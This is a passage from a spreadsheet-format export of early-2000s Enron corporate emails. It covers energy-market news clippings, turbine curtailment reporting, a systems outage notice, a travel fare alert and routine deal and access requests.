"'srutherford@cinergy.com'" &lt;srutherford@cinergy.com&gt;, "'Regina Speed-Bost'" _x000D_
&lt;ryspeed-bost@duanemorris.com&gt;, "'david_j._spigelmyer@corp.cng.com'" _x000D_
&lt;david_j._spigelmyer@corp.cng.com&gt;, "'jimmy_d._staton@cngt.cng.com'" _x000D_
&lt;jimmy_d._staton@cngt.cng.com&gt;, "'David Sweet'" &lt;dsweet@ipaa.org&gt;, "'Lawrence _x000D_
Thomas'" &lt;larry_thomas@reliantenergy.com&gt;, "'cnewk@mh.com'" &lt;cnewk@mh.com&gt;, _x000D_
"'gatroxell@nipsco.com'" &lt;gatroxell@nipsco.com&gt;, _x000D_
"'ken.valentine@piedmontng.com'" &lt;ken.valentine@piedmontng.com&gt;, _x000D_
"'jwallbillich@glgt.com'" &lt;jwallbillich@glgt.com&gt;, "'Katherine Yarbrough'" _x000D_
&lt;kyarbrough@sablaw.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: MAY DAY_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From Lorraine Cross/INGAA: _x000D_
_x000D_
 &lt;&lt;lorraine doc.pdf&gt;&gt; _x000D_
_x000D_
 - lorraine doc.pdf_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 23:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Clipping 02/29/2000</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  Andrea look at the clipping on CGC._x000D_
---------------------- Forwarded by Brent Hendry/ENRON_DEVELOPMENT on _x000D_
01/03/2000 07:46 AM ---------------------------_x000D_
_x000D_
_x000D_
Alexandre Bueno_x000D_
29/02/2000 06:00 PM_x000D_
To: Michael Guerriero/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Pablo _x000D_
Acevedo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bernardo _x000D_
Andrews/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Diego _x000D_
Hollweck/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John J _x000D_
Shoobridge/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Gabriela _x000D_
Aguilar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rodolfo _x000D_
Freyre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Julian _x000D_
Poole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cristian _x000D_
Folgar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Brent _x000D_
Hendry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Andrea _x000D_
Calo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marta _x000D_
Ortiz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Luis _x000D_
Juarros/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Guillermo _x000D_
Canovas/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: Clipping 02/29/2000_x000D_
_x000D_
_x000D_
BRAZIL: MEETING OF MAE ON FEBRUARY 29TH_x000D_
Gazeta Mercantil, 29 Feb 2000, p. A-15:-_x000D_
 Companies which are part of the MAE (Electricity Wholesale Market) will hold _x000D_
a general meeting on February 29th 2000 with the intention to discuss the new _x000D_
rules for the operations of the sector._x000D_
The companies will discuss, for example, one resolution taken on February _x000D_
25th which concedes credits for the companies and other which increases the _x000D_
number of available plants to operate in peak periods._x000D_
_x000D_
_x000D_
BRAZIL: RURAL ELECTRIFICATION IN RIO DE JANEIRO_x000D_
Gazeta Mercantil, 29 Feb 2000, p. a-13:-_x000D_
 According to the president of the Brazilian electricity company Cerj, _x000D_
Alejandro Danus, the company has already informed the Brazilian Ministry of _x000D_
Mining and Energy that it will join the rural electrification program 'Luz no _x000D_
Campo' of the ministry, expecting to sign the contract in 15 days._x000D_
The two other electricity concessionaires which operate in the state of Rio _x000D_
de Janeiro had already agreed to join the program, but Cerj took longer to _x000D_
reach the same decision because it was analysing which technology should be _x000D_
used in its concession area. Cerj is expected to invest R$ 60mn in the area, _x000D_
mainly in the north of the state, benefiting 30,000 families which still do _x000D_
not have access to electricity._x000D_
_x000D_
_x000D_
BRAZIL ANGRA-2 TO START OPERATIONS _x000D_
Folha de S.Paulo, 27 Feb 2000, p. 1-14:-_x000D_
 The Brazilian National Nuclear Energy Commission (Cnen) established the _x000D_
deadline of March 15th 2000 to release an authorisation for the operation of _x000D_
the nuclear power station Angra 2 of the Brazilian state-owned nuclear _x000D_
electricity company Eletronuclear in the Brazilian city of Angra dos Reis _x000D_
(state of Rio de Janeiro)._x000D_
With the authorisation, Angra 2 can begin to charge its reactor, testing and _x000D_
inspecting safety after that. If everything is successful, the power station _x000D_
ill begin to generate electricity in the end of April 2000 and generating _x000D_
1,245 MW 3 months after that. But this time may be much longer, considering _x000D_
that the previous nuclear power station Angra 1 took more than 3 years to _x000D_
operate commercially after the charging. _x000D_
_x000D_
_x000D_
BRAZIL: ELETROSUL IN POWER TRANSMISSION LINE_x000D_
Gazeta Mercantil, 29 Feb 2000, p. a-13:-_x000D_
 Groups which want to compete in the tender for the construction of a power _x000D_
transmission line between the Brazilian cities of Campos Novos and Blumenau _x000D_
(state of Santa Catarina) must be qualified until March 15th 2000._x000D_
The company Eletrosul, a subsidiary of the Brazilian state-owned electricity _x000D_
company Eletrobras, will compete in the tender alone (not participating in _x000D_
any consortium)._x000D_
Eletrosul signed pre-contracts with the companies ABB (Asea Brown Boveri) and _x000D_
Siemens which will conduct works and supply equipment (Eletrosul will operate _x000D_
the lines)._x000D_
_x000D_
_x000D_
ARGENTINA: IMPACT OF POWERGEN'S ACQUISITION_x000D_
El Cronista Comercial, 29 Feb 2000, p. 15:-_x000D_
 With the acquisition of US-based LG&amp;E Energy for US$ 5.4bn, UK-based _x000D_
PowerGen will become the owner of stakes in Argentina's gas distribution _x000D_
companies Gas Natural BAN, Distribuidora de Gas del Centro and Cuyana. LG&amp;E _x000D_
has 1mn clients in Kentucky, Virginia, Spain and Argentina. _x000D_
_x000D_
_x000D_
BRAZIL: FREE IMPORT OF FUEL POSTPONEMENT_x000D_
O Estado de S.Paulo, 26 Feb 2000, p. b-1:-_x000D_
 The Brazilian executive-secretary of the Ministry of Treasury, Amaury Bier, _x000D_
declared on February 25th 2000 that the Brazilian market of oil and _x000D_
derivatives will be opened only in January 2001, and not in August 2000, as _x000D_
predicted in the Oil Law._x000D_
The federal government will propose the change of this date to the Congress _x000D_
through a draft law._x000D_
The reason for this measure, according to Bier, is that the oil sector is _x000D_
currently too confused. He also informed that the government did not create a _x000D_
substitute for the Specific Price Parcel (PPE) yet. The PPE is the part of _x000D_
the fuel price which maintains the oil account._x000D_
_x000D_
_x000D_
BRAZIL: INCREASE OF FUELS PRICES_x000D_
O Estado de S.Paulo, 26 Feb 2000, p. B-1:-_x000D_
 The executive-secretary of the Brazilian Ministry of Treasury, Amaury Bier, _x000D_
announced on February 25th 2000 that the following fuels will have their _x000D_
prices increased on March 1st 2000:_x000D_
- gasoline and diesel oil by 7% in the refineries and_x000D_
- kerosene for aircraft by 23%. _x000D_
According to government estimations, this increase of gasoline prices in _x000D_
refineries will result in an increase by 5% in gas stations, for final _x000D_
consumers. The increase of the kerosene will result in an increase by 3% in _x000D_
flights tickets prices._x000D_
_x000D_
_x000D_
BRAZIL: OIL SPILLAGE IN PARA_x000D_
Folha de S.Paulo, 29 Feb 2000, p. 3-8:-_x000D_
 The Brazilian subsidiary of the American oil company Texaco will keep _x000D_
cleaning the river Para probably by the first weekend of March 2000._x000D_
The company already removed 25% of the total 1.9 tonnes of fuel BPF spilled _x000D_
in the river._x000D_
_x000D_
_x000D_
ARGENTINA: LOWERING TAXES, IMPOSSIBLE FOR NOW_x000D_
El Cronista Comercial, 29 Feb 2000, p.2:-_x000D_
 Officials at the Argentine Revenue Service warn that it would be impossible _x000D_
to lower taxes for now. Many are requesting that fuel and value added taxes _x000D_
be lowered but this would mean US$ 2bn less in government revenues. When _x000D_
considering the government fiscal deficit, it is easy to understand why the _x000D_
government must look toward solutions that would increase tax collection and _x000D_
not reduce it._x000D_
_x000D_
_x000D_
ECUADOR: EDC PLANS TO EXPLOIT GAS_x000D_
El Comercio (Ecuador), 29 Feb 2000, p. 1:-_x000D_
 The firm, Energy Development Corporation (EDC) announced that it will invest _x000D_
some US$ 100mn in a project to exploit natural gas in the coastal zone of _x000D_
Ecuador. Drilling is scheduled to begin in May 2000 with production entering _x000D_
the first phase in the 3rd quarter of 2001 with 32mn cubic feet daily, enough _x000D_
to generate 204 megawatts of electrical energy._x000D_
_x000D_
_x000D_
SPAIN: REPSOL YPF'S STRATEGIC PLANS_x000D_
Cinco Dias, 29 Feb 2000, p.5:-_x000D_
 Spanish oil operator Respsol YPF, which has broken its agreement with _x000D_
Spanish electricity operator Iberdrola, intends to operate in the electricity _x000D_
market in countries where it is active in gas business, particularly _x000D_
Argentina, Brazil and Spain._x000D_
On the other hand, negotiations between Repsol YPF and Italian oil operator _x000D_
ENI (Ente Nazionale d'Idrocarburi) are taking place.  In any case, eventual _x000D_
agreements will be implemented when ENI's privatisation process will conclude._x000D_
Additionally, the Spanish group expects to reduce nearly Euro 520mn costs by _x000D_
2002, mainly through workforce reduction._x000D_
_x000D_
_x000D_
ARGENTINA: SALE OF CGC_x000D_
La Nacion (Argentina), 29 Feb 2000, p. 2/1:-_x000D_
 The investment banks Dresdner Kleinwort Benson and Dresdner Bank are close _x000D_
to a contract to take charge of the sale of a 51% stake in the Argentine oil _x000D_
company Compania General de Combustibles (CGC), owned by Sociedad Comercial _x000D_
del Plata (Soldati group)._x000D_
_x000D_
_x000D_
BOLIVIA: CHACO SEEKS NEW CLIENTS_x000D_
Los Tiempos (Bolivia), 29 Feb 2000, p. on line:-_x000D_
 Bolivia's oil and gas firm Chaco announced it is concentrating its efforts _x000D_
on gaining new clients for the gas it plans to trade from Bolivia to Brazil. _x000D_
The firm will place in Brazil 30mn cubic metres of gas per day during a _x000D_
20-year term, according to the contract it signed with the Brazilian _x000D_
government. Early in 1999, Chaco was negotiating a contract with Pan American _x000D_
Energy which failed due to the opposition of YPF, the Argentine oil company._x000D_
_x000D_
_x000D_
BOLIVIA/BRAZIL: COMPANIES TO TRADE GAS _x000D_
El Diario (Bolivia), 29 Feb 2000, p. on line:-_x000D_
 Bolivia's oil and gas company YPFB informed eight firms will export some _x000D_
9.1mn cubic metres of gas per day from Bolivia to Brazil during the year _x000D_
2000, according to the terms fixed in the contract signed between both _x000D_
countries. The amount to be traded per company is as follows:_x000D_
_x000D_
_x000D_
Firm     Cubic metres per day_x000D_
_x000D_
_x000D_
Andina     1.86mn_x000D_
_x000D_
Chaco     1.52mn_x000D_
_x000D_
Tesoro (British Gas)   1.43mn_x000D_
_x000D_
Vintage     1.36mn_x000D_
_x000D_
Perez Companc   1.21mn_x000D_
_x000D_
Petrobras    0.8mn_x000D_
_x000D_
Maxus     0.67mn_x000D_
_x000D_
Dong Won    0.25mn_x000D_
_x000D_
TOTAL     9.1mn_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Apr 2002 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matt.allsup@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kurt.anderson@enron.com'})</t>
  </si>
  <si>
    <t>Monthly Reports</t>
  </si>
  <si>
    <t xml:space="preserve">Kurt, _x000D_
We changed from the Feb. curtailment format to the new format because _x000D_
curtailments are being recorded more accurately now.  Take this example of a _x000D_
typical curtailment: CPS requests that we keep each line at 30MW.  With the _x000D_
old format, we would enter one line of information that contained all of the _x000D_
turbines that were shut down.  This would work IF the same exact turbines _x000D_
were shut down for the duration of the curtailment.  This is never the case.  _x000D_
To maintain a specific output (which is always what CPS requests) we are _x000D_
constantly shutting down and starting turbines due to windspeed fluctuation.  _x000D_
Using the old format, there would be a new line entered every time another _x000D_
turbine was shut down or restarted.  This would also imply (inaccurately) _x000D_
that all the turbines affected by the curtailment were stopped and started _x000D_
each time a new turbine was added.  _x000D_
_x000D_
With the new format, when we start or stop a turbine we just add another _x000D_
line.  This is the better method of the two to accurately record the down _x000D_
time, because it is itemized.  If the operators follow the procedure that has _x000D_
been given to them, this will be very accurate.  I apologize for the _x000D_
confusion over some of the information on the first March Log.  We have gone _x000D_
over the procedure again with all onsite personnel so we should not see the _x000D_
discrepancies again that we saw in March._x000D_
_x000D_
If you have any questions or suggestions, please give me a call.  Also, if _x000D_
you give me your fax#, I can fax you an original copy of the curtailment form _x000D_
so you can see first hand how the information is recorded._x000D_
_x000D_
Thank you_x000D_
Matt_x000D_
_x000D_
---------------------- Forwarded by Matt Allsup/EWC/Enron on 04/10/2002 01:57 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kurt Anderson_x000D_
04/10/2002 10:57 AM_x000D_
To: Bo Thisted/EWC/Enron@Enron, George Griese/EWC/Enron@Enron, Mike _x000D_
Abbott/EWC/Enron@ENRON_x000D_
cc: Danielle Lewis/EWC/Enron@Enron, Mark Fisher/EWC/Enron@Enron, Mark V _x000D_
Walker/EWC/Enron@ENRON, Matt Allsup/EWC/Enron@Enron, Bryan _x000D_
Gregory/EWC/Enron@Enron _x000D_
_x000D_
Subject: Monthly Reports_x000D_
_x000D_
Hey guys, the attached is the curtailment page from the Feb. Clear Sky _x000D_
monthly report. This format is one that I would like to stick with but if it _x000D_
not practical to provide the information in this format it is acceptable to _x000D_
alter or change it as long as we provide the information in one form or _x000D_
another. I am not sure what drove the change in format but we need to decide _x000D_
how this information will be provided and stick with it on a consistent _x000D_
basis. With the coming changes in the Asset Management group it behooves us _x000D_
to standardize each portion of the monthly report. The person responsible for _x000D_
compiling the information contained in the report as well as preparing the _x000D_
monthly reports is going to change very soon. _x000D_
_x000D_
Lets discuss this soon as the March reports are due next week._x000D_
_x000D_
Thanks_x000D_
_x000D_
KA_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 02:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Well you cant just take away the dinner offer.  I just don't want to get you _x000D_
in trouble with Dave.  </t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 13:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Goldendale Turbine</t>
  </si>
  <si>
    <t xml:space="preserve">Mike, if you Janet or Dave can cut the deal with Izzo go ahead and speak to _x000D_
him.  I don't think there is any practical way to enforce any percieved call _x000D_
we have on Izzo so you will have to determine how much Larry really wants the _x000D_
trubine or how he could benefit from striking a different deal._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/25/2000 _x000D_
08:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Mike J Miller_x000D_
07/25/2000 06:09 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: W David Duran/HOU/ECT@ECT, Douglas Clifford/Corp/Enron@ENRON _x000D_
Subject: Goldendale Turbine_x000D_
_x000D_
Dave,_x000D_
_x000D_
In going through the turbine list over the last few days, EE&amp;CC's, Sumas II- _x000D_
Goldendale (GE 7FA, Jun '01 delivery) turbine keeps popping up.  ENA could _x000D_
trade this turbine to several parties (Tenaska, Indeck) to get a lock on a QF _x000D_
restructuring.  Also, Sumas I still has restructruring value that EE&amp;CC did _x000D_
not get a lock on in exchange for the EPC/turbine contract. _x000D_
_x000D_
As I recall, Larry Izzo promised to replace the GE 7FA turbine with a _x000D_
comparable machine with a Q4-2001 delivery date.  While the Goldendale EPC _x000D_
contract may executed and there may be nothing to do, there is significant _x000D_
value sitting on the table.  If we cannot get the Goldendale 7FA back, then _x000D_
can we enforce the replacement provision that was promised (as I remember) as _x000D_
part of your original deal with Larry Izzo?  I realize that at this point the _x000D_
politics may prevent us from doing anything.  However, I at least want to get _x000D_
you thinking about it just in case there was a way to get a turbine to trade _x000D_
for larger value than an EPC contract for EE&amp;CC._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mike J. Miller _x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 08:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mpalmer@enron.com'})</t>
  </si>
  <si>
    <t>You have access to generation daily?  Just wondering if the guy wrote the _x000D_
story...</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 08:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 12-8-00 through 12-11-00</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
December 08, 2000 5:00pm through December 11,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I:   SEE ORIGINAL REPORT_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:  No Scheduled Outages._x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING:   SEE ORIGINAL REPORT_x000D_
_x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS: HR   SEE ORIGINAL REPORT_x000D_
_x000D_
OTHER SYSTEMS: UNIX     SEE ORIGINAL REPORT_x000D_
_x000D_
OTHER SYSTEMS: REMEDY_x000D_
Impact:  CORP_x000D_
Time:  Fri 12/8/2000 at  5:00:00 PM CT thru Fri 12/8/2000 at  5:15:00 PM CT_x000D_
 Fri 12/8/2000 at  3:00:00 PM PT thru Fri 12/8/2000 at  3:15:00 PM PT _x000D_
 Fri 12/8/2000 at  11:00:00 PM London thru Fri 12/8/2000 at  11:15:00 PM _x000D_
London_x000D_
Outage:  RmailSniffer_x000D_
Environments Impacted:  All_x000D_
Purpose: Review of Mail logs has shown that between 7:00 p.m. and 9:00 p.m. _x000D_
50% of mail messages fail.  The update will copy failed messages to another _x000D_
directory for an admin to process._x000D_
Backout: Reset RmailSniffer service to original settings._x000D_
Contact(s):  Carlos Perez    713-345-708_x000D_
  Christian Smerz   713-345-7410   _x000D_
  _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY:   SEE ORIGINAL REPORT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t>
  </si>
  <si>
    <t>Sat, 17 Nov 2001 18:56:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'memberservices@travelocity.com'})</t>
  </si>
  <si>
    <t>Travelocity.com fare watcher update</t>
  </si>
  <si>
    <t>Saturday, November 17, 2001_x000D_
_x000D_
Dear Mathew,_x000D_
_x000D_
Travelocity Fare Watcher, your personal airfare tracking_x000D_
service, has found fare changes in 2 of your markets._x000D_
_x000D_
Note: Fares change quickly and sell out fast. Visit Travelocity_x000D_
now to take advantage of this great opportunity!  Click on this_x000D_
link or paste the URL into your browser:_x000D_
http://dps1.travelocity.com:80/fwemindiv.ctl?fw=05J9G74&amp;Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
HAVE YOUR TRAVEL NEEDS CHANGED?_x000D_
_x000D_
Looking to go someplace new? Be sure to update your Fare Watcher_x000D_
subscription to include your favorite destinations._x000D_
_x000D_
FARES_x000D_
_x000D_
_x000D_
*  IAH-NYC   FROM: Houston-Bush Intercontinental (IAH)_x000D_
             TO:   New York All Airprts (NYC)_x000D_
   PRICE:    NEW PRICE        WAS        DIFFERENCE_x000D_
             ---------      -------      ----------_x000D_
             $208.00        $262.00      -$54.00_x000D_
_x000D_
*  IAH-ROC   FROM: Houston-Bush Intercontinental (IAH)_x000D_
             TO:   Rochester, NY (ROC)_x000D_
   PRICE:    NEW PRICE        WAS        DIFFERENCE_x000D_
             ---------      -------      ----------_x000D_
             $198.00        $266.00      -$68.00_x000D_
_x000D_
_x000D_
_x000D_
GREAT HOTEL DEALS!_x000D_
_x000D_
Travelocity.com offers Value Rates at great hotels in:_x000D_
New York All Airprts (NYC) starting at just $69_x000D_
Click: http://dps1.travelocity.com:80/hotsrqst.ctl?mode=2&amp;airport=NYC&amp;rate_cat=V_x000D_
_x000D_
_x000D_
Thank you for choosing Travelocity as your one-stop travel_x000D_
resource!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
The Travelocity Team_x000D_
Travelocity.com - Go Virtually Anywhere_x000D_
http://www.travelocity.com/_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
VACATION DEALS!_x000D_
_x000D_
Hot deals to the Caribbean, Las Vegas, and more!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_VAC,00.html_x000D_
_x000D_
CRUISE DEALS!_x000D_
_x000D_
Don't miss a look at our incredible Cruise Deals! Updated daily,_x000D_
find the voyage that suits your budget!_x000D_
http://leisure.travelocity.com/RealDeals/0,2942,TRAVELOCITY_CRU,00.html_x000D_
_x000D_
SAVE $75 IN AIRFARE_x000D_
_x000D_
Get $75 in Rebates on your next Airfare Purchases!_x000D_
Join the Travelocity Preferred Traveler Program and you'll_x000D_
receive up to $75 in rebates on your next three flights, hotel_x000D_
savings and room upgrades, up to 20% off at restaurants_x000D_
nationwide, and more. Enroll today!_x000D_
http://leisure.travelocity.com/preferredtraveler/?source=PM_x000D_
_x000D_
EARN FREE TRAVEL. NO RESTRICTIONS!_x000D_
_x000D_
The NEW Travelocity World MasterCard_x000D_
Earn points towards free travel with new Travelocity MasterCard!_x000D_
You'll earn 1 point for every dollar spent. Earn 8,000 points_x000D_
and you'll receive $100 off your next Travelocity.com booking._x000D_
We'll spot you 4,000 points to get started, so you are already_x000D_
half way there! Visit http://www.travelocitycard.com to apply._x000D_
_x000D_
IMPORTANT FARE INFORMATION:_x000D_
_x000D_
All fares are quoted in US Dollars.  Fares shown are for one_x000D_
adult round-trip between your selected cities and are subject_x000D_
to additional charges, including, but not limited to, Passenger_x000D_
Facility Charges (ranging from $2-$18), Federal Segment Fees of_x000D_
$2.75 per segment (defined as a takeoff and a landing), and_x000D_
taxes/fees associated with international itineraries of up to_x000D_
USD $113 or local currency equivalent. Fuel surcharges, if applicable_x000D_
are included in the fees listed._x000D_
_x000D_
Total fare per passenger, including all charges, will always_x000D_
be displayed to you prior to final ticket purchase. Please note_x000D_
that fares are subject to restrictions, may not be available on_x000D_
all flights, and may change without notice. For detailed descriptions_x000D_
of the fare rules, click on the corresponding rules link._x000D_
_x000D_
CHANGE OR CANCEL YOUR SUBSCRIPTION TO FAREWATCHER EMAIL_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
UPDATE YOUR EMAIL ADDRESS_x000D_
http://dps1.travelocity.com:80/fwemsub.ctl?Service=TRAVELOCITY&amp;LANG=EN_x000D_
_x000D_
RETRIEVE YOUR PASSWORD_x000D_
http://dps1.travelocity.com:80/lognpwdform.ctl?Service=TRAVELOCITY&amp;LANG=EN</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 09:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'larry.hunter@enron.com'})</t>
  </si>
  <si>
    <t>Update on deals</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 07/28/2000 _x000D_
04:14 PM ---------------------------_x000D_
_x000D_
_x000D_
Melanie Strong_x000D_
07/19/2000 09:25 AM_x000D_
To: Judy Hernandez/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Update on deals_x000D_
_x000D_
Hello Judy!_x000D_
_x000D_
 Thanks for getting those Royal Bank deals out to me.  I checked with Melinda _x000D_
on the status of the J. Aron and Engage deals that we were still needing a _x000D_
copy of.  We looked into the J. Aron deal NE4572.1 and it was flagged as _x000D_
executed by Bob Bowen, and she was wondering if we will be requesting a copy _x000D_
of the deal from J.Aron since we don't have a copy.  She was also wondering _x000D_
if the status in TAGG will also be changed.  For the Engage deal NN3957.1 the _x000D_
status shows that is was sent to c/p June 21/00.  Jeff Sorenson said that _x000D_
there is a revision which he is currently doing, and we would need to ask him _x000D_
to send us a confirm.  There was a confirm sent to Engage Canda and a error _x000D_
letter was sent to Engage US.  Perhaps the status was never updated?  If you _x000D_
could look into this for me I would greatly appreciate it._x000D_
_x000D_
Thanks again Judy_x000D_
_x000D_
Melanie Strong_x000D_
(403) 974-6935_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 14:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'connie.sutton@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'michael.morris@enron.com', 'marilyn.colbert@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'mary.gosnell@enron.com', 'charlie.nhan@enron.com', 'mary.solmonson@enron.com', 'chris.wiebe@enron.com', 'elizabeth.hernandez@enron.com', 'lisa.carver@enron.com', 'david.dupre@enron.com', 'mary.botello@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'shonnie.daniel@enron.com', 'elsa.villarreal@enron.com', 'anita.patton@enron.com', 'cyril.price@enron.com', 'colleen.sullivan@enron.com', 'melba.lozano@enron.com', 'ron.ryckman@enron.com', 'lisa.hesse@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'john.sherriff@enron.com', 'mary.smith@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'clem.cernosek@enron.com', 'andrew.lewis@enron.com', 'peggy.hedstrom@enron.com', 'yolanda.cordova-gilbert@enron.com', 'nella.cappelletto@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'tara.eslick@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'cheryl.dawes@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'fred.boas@enron.com', 'eric.wardle@enron.com', 'joy.henderson@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'chris.mendoza@enron.com', 'george.weissman@enron.com', 'karen.lambert@enron.com', 'marlene.hilliard@enron.com', 'brandon.wax@enron.com', 'sony.wilson@enron.com', 'joe.casas@enron.com', 'carlos.rodriguez@enron.com', 'claire.viejou@enron.com', 'linda.bryan@enron.com', 'andrea.guillen@enron.com', 'jim.little@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'robert.walker@enron.com', 'carey.metz@enron.com', 'brent.price@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'kathleen.dunn@enron.com', 'randall.gay@enron.com', 'bradley.diebner@enron.com', 'susan.flynn@enron.com', 'matthew.allan@enron.com', 'cary.carrabine@enron.com', 'nathan.hlavaty@enron.com', 'susan.harrison@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'amita.gosalia@enron.com', 'clint.reck@enron.com', 'sheri.thomas@enron.com', 'tracy.ngo@enron.com', 'veronica.thompson@enron.com', 'kathryn.cordes@enron.com', 'frank.davis@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'susan.trevino@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'suzy.robey@enron.com', 'brant.reves@enron.com', 'rita.wynne@enron.com', 'donna.consemiu@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'lesli.campbell@enron.com', 'cyndie.balfour-flanagan@enron.com', 'dianne.swiber@enron.com', 'mechelle.stevens@enron.com', 'tana.jones@enron.com', 'stacey.richardson@enron.com', "o'neal.winfree@enron.com", 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'paul.henry@enron.com'})</t>
  </si>
  <si>
    <t>Out of Office</t>
  </si>
  <si>
    <t>Global Contracts and Global Facilities personnel will be attending an _x000D_
off-site conference on June 15th and 16th. If you need something while we are _x000D_
away, please do not hesitate to use the Team pagers listed below or call me _x000D_
at  (713) 822-7153. We will have a laptop available to setup contracts if _x000D_
needed.  If you page us we will return your page as quickly as possible. _x000D_
Thanks</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 06:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jason.moore@enron.com'})</t>
  </si>
  <si>
    <t>Global Counterparty Trader ID</t>
  </si>
  <si>
    <t>Please set up the following people with "trader" status under Transwestern _x000D_
Pipeline Company.  We will be using Enron On Line to trade pipeline _x000D_
capacity.  Kevin Hyatt (administrator), Michelle Lokay, Lorraine Lindberg, _x000D_
Jeff Fawcett, and TK Lohman will all need this access.  My network user ID is _x000D_
"mlokay" and each trader will respond with their own user ID.  Thanks.</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 10:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'suzanne.brown@enron.com'})</t>
  </si>
  <si>
